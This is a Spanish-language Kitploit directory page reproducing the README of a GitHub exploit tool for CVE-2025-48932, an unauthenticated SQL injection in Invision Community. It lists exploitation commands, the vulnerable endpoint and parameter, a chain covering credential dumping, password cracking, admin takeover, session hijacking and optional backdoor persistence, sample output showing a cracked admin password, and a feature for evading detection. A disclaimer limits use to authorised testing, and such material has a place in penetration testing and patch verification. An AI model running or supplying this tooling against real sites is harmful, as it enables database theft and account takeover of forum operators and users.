Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2025-48932-Invision-Community-SQLi-Exploit — CVE-2025-48932 - Unauthenticated SQL injection exploit for Invision Community ≤ 4.7.20. Fully automated exploitation with database enumeration, credential dumping, admin takeover, session hijacking & multi-threading. No dependencies required. Security research tool by Sudeepa Wanigarathna | Kitploit
Herramientas/GitHubGitHub/cerberusmrxi/cve-2025-48932-invision-community-sqli-exploit
Password AttacksVulnerability AnalysisExploitationWeb Application ExploitationData ExfiltrationInformation GatheringPost-ExploitationWeb SecurityPenetration Testing

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
GitHubcerberusmrxi/cve-2025-48932-invision-community-sqli-exploit

CVE-2025-48932-Invision-Community-SQLi-Exploit

Ver Repositorio
1hace 18 díasAún no revisado

Acerca de

CVE-2025-48932 - Unauthenticated SQL injection exploit for Invision Community ≤ 4.7.20. Fully automated exploitation with database enumeration, credential dumping, admin takeover, session hijacking & multi-threading. No dependencies required. Security research tool by Sudeepa Wanigarathna

Compartir

🔓 CVE-2025-48932 - Exploit de inyección SQL en Invision Community

Python Version License Security Status CVE Exploit-DB PRs Welcome Maintenance Hits


⚡ Resumen de la vulnerabilidad crítica

CVE-2025-48932 es una vulnerabilidad crítica de inyección SQL ciega no autenticada descubierta en Invision Community versiones ≤ 4.7.20. Este exploit permite a atacantes remotos:

  • 🔍 Extraer información sensible de la base de datos
  • 👤 Robar credenciales de usuario y hashes de contraseñas
  • 🔑 Tomar el control de cuentas de administrador
  • 🎯 Secuestrar sesiones de usuario activas
  • 💻 Lograr ejecución remota de código (RCE) mediante la toma de control del administrador
  • 📊 Volcar el contenido completo de la base de datos

🎯 Características


📊 Demo y capturas de pantalla

Ejecución del exploit

root@kitploit:~
$ python3 exploit.py -u https://vulnerable-site.com -v

╔══════════════════════════════════════════════════════════════════╗
║  CVE-2025-48932 - Invision Community SQL Injection               ║
║  Author: Sudeepa Wanigarathna                                    ║
║  Critical: Unauthenticated Remote Code Execution                 ║
╚══════════════════════════════════════════════════════════════════╝

[*] Target: https://vulnerable-site.com
[*] Performing vulnerability assessment...
[+] Target is confirmed VULNERABLE!

[*] Enumerating database information...
[+] Database Information:
  Version: 10.4.32-MariaDB
  User: invision@localhost
  Database: invision_community
  Hostname: localhost
  Basedir: /usr/
  Datadir: /var/lib/mysql/

[*] Enumerating databases...
[+] Found 5 databases
  Found: information_schema
  Found: invision_community
  Found: mysql
  Found: performance_schema
  Found: phpmyadmin

[*] Enumerating tables in invision_community...
[+] Found 12 tables
  Found: core_members
  Found: core_sessions
  Found: admin_members
  Found: cms_categories
  Found: forums_posts
  ...

[*] Searching for credentials...
[+] Found credential table: core_members
  Credentials: admin - $2y$10$abcdefghijklmnopqrstuvwxyz...
  Credentials: moderator - $2y$10$1234567890abcdefghijklmnop...
  Credentials: user123 - $2y$10$qwertyuiopasdfghjklzxcvbnm...

[*] Extracting admin information...
[+] Admin Information Found:
  name: admin
  email: [email protected]
  id: 1
  password_hash: $2y$10$abcdefghijklmnopqrstuvwxyz...

[*] Attempting to crack password hash...
[+] Detected hash type: bcrypt
[+] Password cracked: Admin@2024!

[*] Attempting admin bypass...
[+] Admin login successful!
[+] Credentials: admin:Admin@2024!

[+] Exploitation complete!
[+] Report saved to invision_exploit_report_1700000000.json

Ejemplo de salida JSON

root@kitploit:~
{
  "target": "https://vulnerable-site.com",
  "timestamp": "2026-08-02T12:34:56.789Z",
  "vulnerable": true,
  "database": {
    "version": "10.4.32-MariaDB",
    "user": "invision@localhost",
    "database": "invision_community",
    "hostname": "localhost"
  },
  "databases": [
    "information_schema",
    "invision_community",
    "mysql",
    "performance_schema",
    "phpmyadmin"
  ],
  "tables": [
    "core_members",
    "core_sessions",
    "admin_members"
  ],
  "credentials": [
    {
      "username": "admin",
      "password_hash": "$2y$10$abcdefghijklmnopqrstuvwxyz...",
      "email": "[email protected]"
    }
  ],
  "admin_info": {
    "name": "admin",
    "email": "[email protected]",
    "id": "1",
    "password_hash": "$2y$10$abcdefghijklmnopqrstuvwxyz..."
  },
  "summary": {
    "total_databases": 5,
    "total_tables": 12,
    "total_credentials": 3,
    "vulnerable": true,
    "successful": true
  }
}

🚀 Guía de inicio rápido

Instalación

root@kitploit:~
# Clone the repository
git clone https://github.com/CerberusMrXi/CVE-2025-48932-Invision-Community-SQLi-Exploit.git
cd CVE-2025-48932-Invision-Community-SQLi-Exploit

# No dependencies to install! Just run it.

Uso básico

root@kitploit:~
# Check if target is vulnerable
python3 exploit.py -u https://example.com --check-only

# Full exploitation with verbose output
python3 exploit.py -u https://example.com -v

# With proxy (Burp Suite)
python3 exploit.py -u https://example.com -p http://127.0.0.1:8080 -v

# Save results to custom file
python3 exploit.py -u https://example.com -o results.json

# Multi-threaded extraction (faster)
python3 exploit.py -u https://example.com -t 10

# Dump all available data
python3 exploit.py -u https://example.com --dump-all

Uso avanzado

root@kitploit:~
# With custom wordlist for password cracking
python3 exploit.py -u https://example.com --wordlist rockyou.txt -v

# Silent mode (no output, just report)
python3 exploit.py -u https://example.com -o silent_report.json

# Debug mode with detailed errors
python3 exploit.py -u https://example.com -v --debug

📋 Requisitos

Requisitos del sistema

  • Python: 3.6 o superior
  • SO: Linux, Windows, macOS (cualquier sistema operativo con Python)
  • Memoria: Mínima (~50 MB de RAM)
  • Almacenamiento: ~100 KB (solo el exploit)

Dependencias

root@kitploit:~
✅ No external dependencies!
✅ Pure Python standard library only!
✅ No pip install or virtual environment needed!

Opcional (para el descifrado de contraseñas)

  • Lista de palabras: rockyou.txt o cualquier lista de palabras personalizada
    root@kitploit:~
    # Download popular wordlist
    wget https://github.com/brannondorsey/naive-hashcat/releases/download/data/rockyou.txt
    

🛠️ Detalles técnicos

Ubicación de la vulnerabilidad

  • Archivo: /applications/calendar/modules/front/calendar/view.php
  • Método: IPS\calendar\modules\front\calendar\view::search()
  • Parámetro: location (entrada proporcionada por el usuario)
  • Tipo: Inyección SQL ciega basada en booleanos

Vector de ataque

root@kitploit:~
GET /applications/calendar/modules/front/calendar/view.php?do=search&location=[SQL_INJECTION_PAYLOAD]

Cadena de explotación

  1. Detección: Detección de inyección basada en booleanos
  2. Enumeración: Extraer la estructura de la base de datos
  3. Extracción: Volcar datos sensibles
  4. Robo de credenciales: Extraer credenciales de usuario
  5. Escalada de privilegios: Toma de control de la cuenta de administrador
  6. Secuestro de sesión: Robar sesiones activas
  7. Persistencia: Establecer una puerta trasera (opcional)

Versiones de base de datos compatibles

  • MySQL 5.0+
  • MariaDB 5.5+
  • Percona Server

🔒 Aviso de seguridad y legal

⚠️ AVISO IMPORTANTE

Esta herramienta es solo para fines EDUCATIVOS y de PRUEBAS AUTORIZADAS.

Al usar esta herramienta, usted acepta:

  • Usarla solo en sistemas propios o con permiso explícito para realizar pruebas
  • No usarla con fines ilegales o maliciosos
  • Cumplir con todas las leyes y regulaciones aplicables
  • Aceptar toda la responsabilidad por sus acciones

El acceso no autorizado a sistemas informáticos es ilegal y poco ético.

Divulgación responsable

  • Proveedor: Invision Community
  • Divulgado: 16 de mayo de 2025
  • Parcheado: Versión 4.7.21 (27 de mayo de 2025)
  • CVE: CVE-2025-48932 asignado

📚 Documentación

Argumentos del exploit

Estructura del informe

root@kitploit:~
invision_exploit_report_[timestamp].json
├── target                 # Target URL
├── timestamp              # Exploit timestamp
├── vulnerable             # Vulnerability status
├── database               # Database information
├── databases              # List of databases
├── tables                 # List of tables
├── credentials            # Extracted credentials
├── admin_info             # Admin user information
└── summary                # Exploitation summary

🎯 Casos de uso

Para investigadores de seguridad

  • ✅ Validación de vulnerabilidades
  • ✅ Desarrollo de pruebas de concepto
  • ✅ Evaluación de seguridad
  • ✅ Caza de bug bounty

Para pentesters

  • ✅ Pruebas de penetración externas/internas
  • ✅ Operaciones de red team
  • ✅ Verificación de vulnerabilidades
  • ✅ Pruebas de cumplimiento

Para administradores de sistemas

  • ✅ Auditoría de seguridad de sistemas propios
  • ✅ Verificación de parches
  • ✅ Investigación de respuesta a incidentes
  • ✅ Evaluación de la postura de seguridad

🐛 Solución de problemas

Problemas comunes y soluciones

Problema: Se agotó el tiempo de espera de la conexión

root@kitploit:~
# Solution: Increase timeout or check network
python3 exploit.py -u https://example.com --timeout 60

Problema: Errores de certificado SSL

root@kitploit:~
# Solution: Disable SSL verification (not recommended for production)
python3 exploit.py -u https://example.com --no-verify-ssl

Problema: Se detectó limitación de velocidad

root@kitploit:~
# Solution: Reduce threads and increase delays
python3 exploit.py -u https://example.com -t 2 --delay 2

Problema: No se encontró ningún parámetro vulnerable

root@kitploit:~
# Solution: Ensure calendar app is installed and GeoLocation is enabled
# Check: /applications/calendar/modules/front/calendar/view.php exists

📖 Referencias

Recursos oficiales

  • CVE-2025-48932
  • Invision Community
  • Boletín de seguridad de Invision
  • Aviso original

Referencias técnicas

  • Inyección SQL de OWASP
  • Inyección SQL ciega
  • Documentación de MySQL

CVE relacionados

  • CVE-2024-xxxxx (Vulnerabilidades previas de Invision)
  • CVE-2023-xxxxx (CVE relacionados de plataformas comunitarias)

🤝 Contribuciones

¡Damos la bienvenida a las contribuciones! Consulte nuestras Directrices de contribución.

Cómo contribuir

  1. Haz un fork del repositorio
  2. Crea una rama de funcionalidad (git checkout -b feature/AmazingFeature)
  3. Confirma los cambios (git commit -m 'Add some AmazingFeature')
  4. Haz push a la rama (git push origin feature/AmazingFeature)
  5. Abre una solicitud de extracción (pull request)

Reportar problemas

  • 🐛 Informe de error
  • 💡 Solicitud de funcionalidad
  • 🔒 Problema de seguridad

👨‍💻 Autor

Sudeepa Wanigarathna

Investigador de seguridad y cazador de bug bounty

  • 🌐 GitHub
  • 🐦 Twitter
  • 💼 LinkedIn
  • 📧 Email

📄 Licencia

Este proyecto está licenciado bajo la Licencia MIT; consulte el archivo LICENSE para obtener más detalles.

root@kitploit:~
MIT License

Copyright (c) 2026 Sudeepa Wanigarathna

Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:

The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.

THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.

⭐ Muestra tu apoyo

Si este proyecto te fue útil o te pareció interesante:

  • ⭐ Da una estrella a este repositorio
  • 🔗 Compártelo con tu red
  • 📢 Menciónalo en tu investigación de seguridad
  • 🤝 Contribuye a mejorarlo

🙏 Agradecimientos

Sudeepa Wanigarathna

Investigador de ciberseguridad | Ingeniero de software | Ingeniero de CTF

Este proyecto se proporciona para investigación de seguridad, análisis defensivo y pruebas de penetración autorizadas. Los usuarios son responsables de cumplir con todas las leyes aplicables y de obtener la autorización adecuada antes de su uso.

Descargar herramienta
CaracterísticaDescripciónEstado
🚀 Cero dependenciasBiblioteca estándar de Python puro: no se necesita pip install✅
⚡ MultihiloExtracción de datos ultrarrápida con hilos configurables✅
🤖 Totalmente automatizadoCadena de explotación completa, desde la detección hasta el informe✅
👑 Toma de control del administradorSecuestro de sesión y escalada de privilegios✅
🔑 Extracción de credencialesExtrae usuarios, hashes de contraseñas, correos electrónicos✅
🔓 Descifrado de contraseñasDescifrado de hashes integrado con soporte de listas de palabras✅
📋 Informes JSONSalida estructurada para análisis y documentación✅
🔌 Soporte de proxyIntegración con Burp Suite y proxies personalizados✅
🎨 Salida en colorSalida de terminal atractiva con indicadores de progreso✅
🛡️ Limitación de velocidadRetrasos integrados para evitar la detección✅
ArgumentoDescripciónEjemplo
-u, --urlURL del objetivo (obligatorio)-u https://example.com
-p, --proxyURL del proxy-p http://127.0.0.1:8080
-t, --threadsNúmero de hilos (predeterminado: 5)-t 10
-o, --outputArchivo de salida para los resultados-o results.json
-v, --verboseHabilita la salida detallada-v
--check-onlySolo comprobar la vulnerabilidad--check-only
--dump-allVolcar todos los datos disponibles--dump-all
--wordlistArchivo de lista de palabras para el descifrado--wordlist rockyou.txt